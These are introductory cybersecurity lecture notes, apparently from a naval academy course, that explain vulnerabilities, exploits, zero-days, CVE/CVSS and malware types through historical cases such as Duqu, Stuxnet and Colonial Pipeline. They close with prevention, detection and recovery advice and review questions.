BRAND: Programs – Input/Output, Conditionals, and Vulnerabilities

Learning Outcomes

After completing these activities you should be able to:

Programs - Vulnerabilities

Relate issues regarding basic programs to more complex programs and information systems

Programs - Malware

Classify various types of malware.
Describe malware as an attack vector that in most cases depends on both a vulnerability and a user action; define "zero day".

Vulnerabilities, Exploits, and Malware

Previous lectures have mentioned the concept of vulnerabilities; in our JavaScript lecture, for instance, we explored some examples where code behaved unexpectedly by not properly handling the data type (string, number, boolean) of a user’s input, potentially causing a security issue. The examples below also highlight some real-world instances where software vulnerabilities impacted military systems.

USS Yorktown (1997): During testing of a Smart Ship automation system, a sailor entered 0 which was used as a divisor in a calculation, causing a divide-by-zero error. The resulting crash cascaded through the ship’s local network, disabling the Smart Ship systems and leaving the Yorktown dead in the water for nearly three hours.
MIM-104 Patriot Missile System (1991): The Patriot weapons-control software gradually lost tracking precision the longer it ran without restart; after extended operation (weeks in the field) the system’s accuracy degraded significantly. On February 25, 1991, this degradation contributed to a failure to properly track a Scud missile that struck a nearby barracks, killing 28 U.S. service members.
F-22 Raptor test flight (1992): The F-22’s fly-by-wire flight-control software encountered unexpected behavior when the pilot performed two concurrent actions (retracting landing gear while engaging afterburner). That unanticipated interaction produced a physical oscillation outside the software’s expected parameters and led to a crash of the first flying prototype.
Friendly-fire airstrike (Kandahar, 2001): During a JDAM strike, a GPS targeting device used by U.S. Special Forces lost power when its battery died; after the battery was replaced and the device rebooted, the unit’s startup sequence reset the saved target coordinates to the device’s location. The resulting error caused an airstrike that killed three U.S. Special Forces personnel.

The above case studies involved complex software that involved thousands to millions of lines of code, making it incredibly difficult to identify flaws. The code snippet below, which we also saw in the JavaScript lecture, is far shorter. It is meant to demonstrate basic ATM functionality, but it has a security flaw. Can you identify it?

Withdrawing Money from an ATM

In this example, the ATM code doesn’t check for negative numbers; if an adversary entered a negative value, their balance would increase!

In our Cross-Site Scripting lab, we took this a step further. The lack of sanitization left the message board website vulnerable to injection attacks, where user input was treated as raw HTML (or JavaScript), allowing an attacker to alter website content, steal cookies, and even redirect users. This kind of weakness is a vulnerability — a flaw or weakness in a system, application, or network that can be exploited or misused to cause harm. Vulnerabilities can exist anywhere in a computer system, from the operating system and application layer down to firmware and even hardware.

When attackers discover such weaknesses, they often develop an exploit — a piece of code or program designed specifically to take advantage of that security flaw. Exploits are the practical tools of attack: they turn a theoretical weakness into a working method of intrusion. For example, in the context of a vulnerable database, an exploit could be specially crafted input that results in confidential database entries being leaked or database values being deleted (for more info on this, read up about SQL injections).

Exploits are often used by programs known as malware, short for malicious software. Malware is any program that is covertly placed on a computer or electronic device with the intent to compromise the confidentiality, integrity, or availability of data, applications, or operating systems. Malware generally does not refer to software with unintentional bugs that adversely impact the confidentiality, integrity or availability of an information system. Malware usually represents a different approach to attacking a system than the network attacks we've discussed, because the victim generally installs the malware or takes some action that results in the malware being installed — not realizing what they're doing, of course. In other words, instead of breaking into a system, we trick users into inviting us in.

There are many different types of malware — viruses, worms, trojans, ransomware, and spyware, among others — but they all share the same core goal: to damage, steal, or control digital assets without authorization. In our XSS example, the injected script that steals cookies or redirects users is effectively acting as a small piece of malware running within the browser.

A particularly dangerous scenario arises when attackers exploit a vulnerability that no one else knows about — not even the developers who created the system. This kind of weakness is called a zero day, referring to the fact that defenders have had zero days to detect or patch it. Zero-day vulnerabilities are especially valuable in the cybersecurity world because they can be used to silently compromise systems before any updates or mitigations exist. Governments, intelligence agencies, and cybercriminal organizations have been known to pay large sums for zero-day exploits, given their potential impact.

Cataloging Vulnerabilities, Exploits, and Malware

Vulnerabilities, exploits, and malware are obviously concerning. Before we even begin discussing how to defend against them, one of the first steps in cybersecurity is to identify and catalog them. Just as scientists classify viruses and engineers track software bugs, cybersecurity professionals maintain public records of known vulnerabilities and malicious software.

For vulnerabilities, this process is standardized through the Common Vulnerabilities and Exposures (CVE) system. A CVE is a unique identifier assigned to a specific, publicly known security flaw, akin to a a serial number for vulnerabilities. Each CVE entry provides a short description of the issue, along with references to more detailed information or patches. For example, the “EternalBlue” exploit that targeted older versions of Windows leveraged a vulnerability identified as CVE-2017-0144. (CVEs - more formally, CVE Records - are formatted as "CVE-{year published}-{4-7 digit numeric identifier}")

While a CVE tells us what the vulnerability is, it doesn’t tell us how bad it is. That’s where the Common Vulnerability Scoring System (CVSS) comes in. CVSS assigns a numerical score (from 0.0 to 10.0) that reflects the severity of a vulnerability, based on factors like how easily it can be exploited, whether it requires user interaction, and the potential impact on system confidentiality, integrity, and availability. For instance, a local vulnerability requiring physical access might score around 4.0 (medium), while a remotely exploitable flaw allowing full system takeover could rate as 9.8 or even 10.0 (critical).

We will both CVE and CVSS in greater detail later in the Vulnerability Management and Incident Response lecture, but for now, it’s important to recognize that these systems give us a common language for discussing and prioritizing vulnerabilities across the cybersecurity community.

Similarly, malware is also catalogued and tracked, though it's a bit less formalized. Malware can be identified by names (like WannaCry or ILOVEYOU), families (groups of related variants that share code or behavior), or file hashes. Security researchers and antivirus vendors maintain massive databases of malware samples, allowing analysts to compare newly discovered threats to known ones, detect variants, and study their evolution over time. We will dive a bit deeper into the characterizaiton of threat actors and their tools, including malware families, in the upcoming Cyber Threat Intelligence lecture.

For now, let’s shift our focus to the types of malware—the different forms these malicious programs can take and how they achieve their goals.

Bugs in the JavaScript Interpreter and the 2008 PWN2OWN Contest
The bugs that we've looked at so far (possibility of infinite loops, bad input crashing programs, and unexpected input allowing us to cheat at games) are all problems with JavaScript programs. Only the writers and users of these programs need to worry about them. A much deeper and more worrisome problem arises when there is a bug in the JavaScript interpreter. When that happens, a malicious JavaScript program can take advantage of the bug in the interpreter to actually make the user's browser or even the user's PC do bad things.

Every year the security conference CanSecWest holds the PWN2OWN contest, where participants try to exploit (take advantage of) bugs in browsers in order to "PWN" a computer whose browser visited their web page. Essentially, you've pwned a computer if you can get it to execute shell commands of your choosing & preferably in an administrator/root shell. In 2008, one group took advantage of a bug in Apple's Safari browser's JavaScript interpreter to pwn a MacBook Air. In other words, the MacBook Air's browser followed a link to this groups evil web page, and two minutes later they were able to send shell commands to the MacBook Air and have it execute them. Check out this 2008 news article or, if you really want to know, you can look at this whitepaper by the team that created the hack.

Verizon Data Breach Investigations Report

Each year organizations track the type and quantity of known data breaches in order to recognize trends and allocate resources to defend against the most likely and/or the damaging types of attacks. We'll learn more about the way in which these decisions are made, a process called Risk Analysis/Risk Management, in the next lesson. The most widely recognized data breach report in the corporate sector is the Verizon Data Breach Investigations Report published by Verizon, the same internet service provider and telephone company that the academy uses. The report is publicly available via their website. Below is a chart showing the types of successful data breaches in 2017 in which someone not only attempted but succeeded to access a system they did not have authorization to access.

2017 Data Breach Investigations Report Chart

Verizon Data Breach Investigations Report by Verizon Communications Inc., 2017.

This webopedia article is actually not a bad little write-up on the distinction between virus/trojan/worm.

Computer Virus Grounds Drone Fleet

Viruses and malware are problems out in the fleet, not only on people's everyday work computers, but also in the computers used to control platforms — like UAVs. Click on the image to the right to read about how a persistent virus on computers used to control drones disrupted operations in the Fall of 2011.

Types of Malware

Virus

This term is the most broadly used word to describe unwanted programs on our computers. A computer virus is a computer program that with user action can replicate itself and "infect" a computer. This is typically done without the knowledge of the user. A virus might corrupt or delete data on a computer, or even the whole hard drive.

A virus will attach itself to another program or file on your computer. Most often they will attach to executables, and cannot run unless the executable file is executed. A virus cannot spread past your computer without some human action assisting. There are many different kinds of viruses including:

Macro: A virus written in a macro language for a separate application, such as a word processor. Some programs allow macro programs to be embedded in documents (Microsoft Office products), this provides a unique vector for viruses. A famous example is the Melissa virus. The virus was a macro inside a Microsoft Word document named List.DOC. A macro embedded in a Word document is exactly analogous to a script embedded in a web page: when the word document is opened, the macro is executed. In the case of the Melissa virus, the macro/script did some bad things, including sending e-mails out to the first 50 addresses in your "address book" that had List.DOC as attachments, thereby propagating itself.
Program virus: This is the most traditional virus, a stand-alone executable program attached to some other file (which usually looks benign).
Boot sector: A virus that starts every time a computer boots. This can be mitigated by setting this area on the disk to read-only, so that only the Administrator can override.

Worms

A computer worm is a self-replicating, self-propagating program that uses networking mechanisms to spread itself. This is a virus with the added functionality of spreading across a network without any help from a user. This is in contrast with most viruses and Trojans, which rely on the unwitting help of users. A worm typically scans the surrounding network and then exploits specific vulnerabilities in the host operating systems or services via an open port and then transfers itself to the new host. There are also other methods of propagation.

The Stuxnet worm targeted Siemens Supervisory Control and Data Acquisition (SCADA) systems.

Some famous examples:

Trojan Horse

A trojan horse is named for the famous Greek story of ancient times. In the computer world, a trojan horse is a program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes exploiting legitimate authorizations of a system entity that invoked the program. In contrast to viruses, Trojans don't try to propagate — they don't try to replicate themselves or send themselves to other machines. In fact, "trojan" refers to the mechanism by which the malware is delivered, not really to the malware itself. Once malware is delivered via a trojan, it might be used to gain access to other hosts, but not usually via the same trojan mechanism.

Back Orifice is an example of a trojan program. It provided legitimate functionality as a remote administration tool, but other functionality made it less suited for this legitimate role. The Back Orifice server program can hide itself from cursory inspections of the system and can even be installed without the user's permission.

Another vector prevalent today is through anti-virus programs on the web. A person visits a web site, and a pop-up window indicates they have 17 different types of spyware/viruses on their computer. If the user then downloads the program to eliminate the malware, he or she has now installed a different malware program! The initial windows that the user sees is in all likelihood just making up results to get the user to download the program.

To see a concrete example of a Trojan Horse, go check out your personal SY110 web page (recall: http://midn.cyber.usna.edu/~m9999/index.html).

Oh not, it looks like your website has been compromised! What happened? It turns out that in the sy110animation.js file you were told to embed, there was a hidden logic bomb - a piece of code that was not activated until some condition was triggered. In this case, the portion of code executed when the time and date was between 0700 and 1600 on the day of this lecture (the date should be read year, month, day, hour, minute, second with month starting at 0). Once that date and time condition was met, the code replaced the inner HTML of the website’s tag with the specified image, effectively defacing the website.

Ransomware

Now that we have categorized some malware by delivery method, let us look at a type of malware categorized by what it does once it is delivered- ransomware. Just like a normal ransom where a criminal demands money in exchange for a hostage, a cyber criminal can use ransomware to demand money in exchange for some demand. CISA defines ransomware as an ever-evolving form of malware designed to encrypt files on a device, rendering any files and the systems that rely on them unusable. We will cover encryption later in the course, but for now think of encryption as scrambling your data with a "secret" key that only the attacker knows. Then when the authorized user tries to access her files, she is unable because she does not have the key to unscramble the data. This type of malware can be particularly insidious, because just like in a hostage situation, the clock is ticking for the victim to pay the ransom.... or else.

Colonial Pipeline and Darkside
You may have heard about the Colonial Pipeline hack in 2021. This significant attack is an example of ransomware where Colonial Pipeline, a U.S. energy company, was attacked and could not access their own systems. This inability to access their systems caused Colonial Pipeline to have to shut down many of their pipelines which supply significant amounts of fuel to the U.S. East Coast from Texas to New Jersey. Gas shortages and price increases were feared, but limited to a few days after the company paid out the ransom to the suspected attackers, a group named Darkside.

There were some silver linings to this story aside from the increased awareness for ransomware attacks on a national level. The FBI was soon able to recover more than half of the ransom that Colonial Pipeline paid to the attackers. Like most ransomware attacks, Darkside requested the ransom via Bitcoin, which the FBI was able to trace back to a specific wallet and acquire a key to get the money back. You can read more of the details on this ransomware attack at this news article.

An attacker can do a few things with the data if the ransom is not paid. The attacker can simply never reveal the key to unscramble the data thus effectively "deleting" the data forever. So in the never ending cat and mouse game of cybersecurity, many organizations have started backing up data on other devices so that if they are victim to a ransomware attack, they will not have to pay the ransom and have a backup copy. Now, this method is still costly as any interruption in use of data (think about the pillars here!) will take costly time and resources from an organization. Attackers have not let this backup method stop ransomware attacks. Now many attackers don't just threaten to destroy the key and "delete" the data, but they often threaten to release the data to everyone. Now, you may wonder, isn't that ok if the attacker releases the data back to everyone since the organization will get its data back. Well, not exactly- think of a hospital with thousands of patients' medical history being released or a company with proprietary information. Attackers releasing the data back to everyone can and does have serious privacy implications. Some companies and organizations even have specific ransomware insurance! The best way to deal with ransomware is to not get it. Easier said than done- but like most cyber security risks, vigilance, training, and good cyber hygiene are effective mitigations.

Other Malware Types

There are additional malware types, such as adware (downloads or displays unwanted ads when a user is online or redirects search requests to certain advertising websites) and spyware (gathers a user’s sensitive information and reports it to unauthorized third parties). For some additional information, take a look at this Malware Tip Card, courtesy of the Cybersecurity and Infrastructure Security Agency (CISA).

Malware: What can it do?

Once on your system, Malware could be doing a host of bad things beyond just ransomware.

Files could be deleted or sent back to the attacker. This is not very imaginative, of course, but still bad for you.
Your machine could become a zombie, i.e. a host that's owned (in the sense of being able to give it commands as administrator) by a bad guy and, at his bidding, might be used to do bad things like send spam or participate in a DDoS attack. Collections of zombies with a single master are often called botnets. There are large botnets out there of hundreds of thousands of hosts, whose services are for sale. Malware often uses the Internet to communicate with a command and control host from which it receives instructions on what to do next. Zombie hosts may simply be waiting for a signal from the command and control host.
Check out Attack of the Bots, Wired Magazine, 2006. It's a bit old (2006) but is, in typical Wired fashion, a very nicely written, engaging account of a botnet attack. Botnets are a serious problem, posing a threat not only to businesses, but even to governments.
Your machine may become a springboard for a larger attack against the system you are a part of. Once again, there may be a command and control host sending instructions as to what to do next.
Programs that violate confidentiality might be installed, like keyloggers which capture what you type (or more generally what you click on or see on the screen). The Malware could even turn on your computer's webcam unbeknownst to you and get a video feed! [Computer Technician Trevor Harwell Installed Peeping Software On Women's Computers, Sophos press release on webcam spying ]
Revisiting the DoD ban on USB sticks

You now know enough to understand the malware threat that led to the DoD banning use of USB sticks. It was named "Agent.btz", and is a variant of "SillyFDC" with the following capabilities:
- it begins executing when the Windows Desktop appears
- it injects code into explorer.exe (i.e., the Windows Desktop program itself)
- copies itself to attached removable drives (e.g., a USB stick)
- executes automatically when an infected removable drive is attached
- can download and install files from particular URLs
- modifies security settings and Safe Mode settings
- bypasses Windows firewall and disables Task Manager
Imagine that malware on the NIPRnet!

Duqu: a mini case study

One instance of Malware that has recently come to light is known as Duqu. Taking a little closer look at it is worthwhile because it illustrates a few points from this lesson along with connections to prior lessons. First off, there have been several Duqu attacks. We're talking about one of them. An interesting feature is that they each appear to have been somewhat customized to their target.

Getting a foot in the door
Duqu was initiated with a spearphishing attack: an e-mail to a company employee requesting more information with, in particular, the line "In the attached file, please see a list of requests." The "attached file" was an innocuous-looking Microsoft Word document. Opening up that Word document is what started all the trouble. In this we see why malware offers a different approach to attacking: the user actually opened the door and let the attacker in when he opened that e-mail.
The exploit: executing shell-code with administrator privileges
So how could simply viewing a Word document cause problems? Well, the Word document sent in this attack contained an "embedded font", meaning that the file contained within it a block of bytes that defined what the characters used in the document should look like when displayed. The bytes that comprise the font definition are read in and processed by OS code that runs with administrator privileges. The font definition was actually badly formed in such a way as to trick this OS code into executing shell code (which was also part of the badly formed font definition) which, because it was executed by the OS code, ran with the highest possible privileges. This shell code installed the Duqu malware, which then was up and running long-term on the host, regardless of whether the Word document or Word itself remained open.
Once established, what did it do?
The motives of the attackers using Duqu have not been publicly reported. But some of the activities of the malware, if not the reasons for the activities, have been disclosed. Duqu contacted a command-and-control (C&C) server to receive instructions. In fact, the communication between C&C and the infected machine was done over HTTP and HTTPS. At least one Duqu C&C server, though not the one in the attack we're describing, was traced to a machine in Belgium at IP address 77.241.93.160. The C&C server loaded an extra module (piece of code) on the infected host that allowed it to attack another machine on the same network, making use of that local network access. Yet another module loaded onto the infected host by the C&C server was a key logger, which logged keystrokes and grabbed screen captures.

Further Reading

symantec.com Information on the scope of Duqu infections.
securelist.com A detailed description of one particular infection. Lots of nice screenshots!
nist.gov NIST National Vulnerability Database entry for the Windows font processing vulnerability exploited by Duqu.
informationweek.com 7 Facts On Duqu Malware Attacks

Malware as a Weapon

Malware has actually been used as an alternative to physical ("kinetic") attacks. In particular, as was related in a June 1 NY Times article, the U.S. and Israel cooperated to produce malware dubbed "Stuxnet", which was designed to cripple the Iranian nuclear weapons program. The article claims that one of the motivations for the U.S. in creating Stuxnet was to dissuade Israel from carrying out a physical attack. Was the U.S. also responsible for the Flame malware? Duqu?

There are serious ethical, legal, and policy questions surrounding the use of offensive "cyber weapons". With the revelation that the U.S. has created and used such a weapon, the debate around these questions has become more urgent. You are taking or will take courses here at USNA about ethics, policy and even law. Keep these questions about the use of cyber weapons in mind as you take these other courses.

Prevention/Detection/Recovery

Malware Prevention	Malware Detection	Recovery
Email: Leverage digital signatures. Encrypt messages. Verify the source of the originating message by contacting senders using official means. - Don't use contact details or links provided in an email message. Instead, visit the official website or track down contact phone numbers through other appropriate resources - Social engineering techniques will create urgent, time-sensitive requirements. Take a moment to think of fraudulent schemes and clear your mind before providing information or immediately responding Personal email protections through aliases and masked emails, where appropriate. - Yahoo, DuckDuckGo, Apple, FireFox, Protonmail and many other email services offer the ability to increase privacy through email alias and masking services Endpoint Security: Leverage the full security protection suite, to include web and online threat prevention, anti-virus, firewalls, vulnerability scanning, spam filtering, and ransomware remediation. Maintain up-to-date software and definitions, to include system updates and 3rd party software. Don't connect unknown devices or media to the system. Software: Only install approved software provided by the organization. Verify and scan downloaded files. Remove unused and unnecessary applications from a system. Mobile Devices: Employ the use of Endpoint Security. Use trusted VPN services to secure and encrypt wireless communications. Only connect to known WiFi networks. Use a passthrough firewall (i.e. portable wireless router) when connecting to unknown or open WiFi networks. Disable all wireless transmissions when not in use (e.g. Bluetooth, NFC, WiFi, etc...). Leverage encryption services for app messaging, email, and passwords. Limit permissions for apps, remove unused apps, and update required apps to the latest versions. Use data at rest encryption for all mobile devices Be aware of your surroundings and keep mobile devices physically secured. - Do not leave phones on tables while dining - Do not leave laptops in vehicles - Use cable locks where possible Online: Websites and browsers should require the use of TLS1.2 or 1.3 in addition to HTTP Strict Transport Security (HSTS) Remove revoked, expired, and untrusted root certificates Utilize only trusted DNS services. - Enterprise networks should implement Domain Name System Security Extensions (DNSSEC) - Personal and home networks should leverage automated DNS protection services, such as OpenDNS Best Practices: Understand and comply with system usage policies Enable auditing and monitor audits. Correct any unsafe habits/policy violations. Keep systems physically secure. Report any abnormal response/uninitiated behavior to your system administrator immediately.	Users are often the first ones to observe an alert or anomalous behavior on a system or network. This includes any message prompted by endpoint detection software or the malware itself, as is the case for ransomware. System logs will often provide network administrators with connections, failures, and unexpected errors because of malware. Network security devices, such as firewalls, IDS, IPS, and ACLs will also generate logs that drop, reject, match rules, or have significant performance issues because of negative impacts by malware. Heuristics, behavioral, or hybrid-based detection methods will be employed across the suite of security tools to maximize the likelihood of successful identification while reducing false-positive (type I) and false-negative (type II) errors.	Recovery is used to return the system or network to a nominal state prior to impact. Keep the following in mind as a user: Contact the IT Department or network security administrator. Do not take actions on your own as it may create additional problems or impede a proper and complete investigation. - The latest enterprise endpoint security tools have the ability to isolate systems from the network without physically disconnecting or powering it off. This enables security tools and incident response teams to access and evaluate issues while preventing malware from spreading or impacting the network. Be honest! If system usage policies were violated, it will be known but not identifying the real cause will hinder any investigation and further delay proper responses from the incident response team, thereby exacerbating the problem. If you are honest up front the team can fix the issue and remediate policy violations at a later time. Backup your important files or ensure it's saved to the cloud. You should do this at periodic intervals. This is like car insurance. You want it there if you ever need it, but you hope you never need it. A compromised system will likely be replaced with another one. If a serious investigation is required, the hard drive will be pulled form the system to have forensics conducted. Most cases, the system will be rebuilt with the latest image and all information on the drive will be wiped.

Thinking Critically: Not Everything Is a Cyber Attack

Information systems can fail for many reasons, not just because they have been attacked in cyberspace. They have failed before there were hackers, and in a utopia where hackers do not exist, they would still fail from time to time. Sources of failure can be internal - faulty administration, feckless users, poorly-written software, or low-quality hardware. Systems and the machines they control can also fail from external factors such as natural events (weather, earthquakes, animals, ...), human-caused accidents, or operator error. To quote the former Deputy Director of NSA (and a member of our cyber faculty Chris Inglis), "I don't think paralysis [of the electrical grid] is more likely by cyber-attack than by natural disaster. And frankly the number-one threat experienced to date by the US electrical grid is squirrels." Check out Inside Energy's, "Data: Explore 15 Years of Power Outages" report for an in-depth look at what causes power-outages ... or for some fun, checkout the Cyber Squirrel website to see all their ongoing operations against wires worldwide.

There are two lessons here. First, just because your system failed does not mean that hackers were at fault. Although we should always be alert to the possibility that failure was induced, we should always be receptive to the possibility that failure stemmed from other causes. Second, just because you've protected your system against hackers does not mean that your systems will not fail. There must always be contingency plans to carry out the mission based on the possibility of failure.

Supplemental Media:

This is what happens when you reply to spam email

Review Questions:

What are some examples of vulnerabilities in DoD systems that were introduced by user input errors?
How do we classify malware?
What is the difference between a Virus and a Worm?
What is it about Trojans that entices users to install them?
What is the difference between Adware and Spyware?
Can you explain how Ransomware works?
Can you name a few recent worms?
What are the different types of a virus?
Why are rootkits hard to remove?
What can you do to prevent getting malware when browsing the web? Using email? Using removable media?
How do we detect malware (name a few different ways)?

References

CISA, 2021. "Stop Ransomware" CISA
https://www.cisa.gov/stopransomware

Goodin, Dan. 2008. "Mac Is the First to Fall in Pwn2Own Hack Contest." The Register, March 28, 2008.
https://www.theregister.co.uk/2008/03/28/mac_hack/

Paramadilok, John. 2020. "Teleworking & Ensuring Cybersecurity at Home." CHIPS, April-June 2020.
https://www.doncio.navy.mil/chips/ArticleDetails.aspx?ID=13542

Poulsen, Kevin. 2017. "Two Dudes Prove How Easy It Is to Hack ATMs for Free Cash." Wired, June 3, 2017.
www.wired.com/2014/11/nashville/

Schmitt, Eric. 1992. "Computer Flaw Suspected in Test-Plane Crash." New York Times, April 30, 1992.
https://www.nytimes.com/1992/04/30/us/computer-flaw-suspected-in-test-plane-crash.html?mtrref=undefined&gwh=D78E1C65FA340D601C56B58C59C8A3D5&gwt=pay

Thompson, Mark. 2014. "U.S. Military: The Curse of 'Friendly Fire'." Time, June 11, 2014.
http://time.com/2854306/the-curse-of-friendly-fire/

U.S. General Accounting Office. 1992. PATRIOT MISSILE DEFENSE: Software Problem Led to System Failure at Dhahran, Saudi Arabia. Washington: February 4, 1992.
https://www.gao.gov/assets/220/215614.pdf

Wired Staff. 1998. "Sunk By Windows NT." Wired, July 24, 1998.
https://www.wired.com/1998/07/sunk-by-windows-nt/

Vulnerabilities and Malware